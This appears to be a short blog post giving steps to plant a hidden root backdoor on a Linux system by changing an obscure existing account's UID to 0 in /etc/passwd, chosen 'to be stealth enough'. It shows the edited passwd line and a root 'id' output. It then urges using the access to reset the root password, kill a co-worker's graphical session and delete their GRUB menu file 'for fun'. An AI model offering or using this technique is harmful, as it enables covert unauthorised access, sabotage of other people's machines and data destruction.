OK, you have the console logged just in front of you! Let's go for the simplest backdoor (much simpler than the wheel gid + visudo previously posted): the UID 0 account!
- Edit the /etc/passwd.
- Choose an account with a dummy name and a shell environment (do not create a new one: it would not be stealth enough).
- Change its UID to 0.
- Eventually reset its password if you do not know the original one.
Done.
$ cat /etc/passwd root:x:0:0:root:/root:/bin/bash [...] prout:x:0000:1016::/home/prout:/bin/bash $ su - prout Password: #id uid=0(root) gid=1001(prout) groups=0(root),1001(prout)
Now, you can reset the root password on demand, kill the graphical interface of your co-worker on demand, and delete his /boot/grub/menu.lst for even more fun!
No comments:
Post a Comment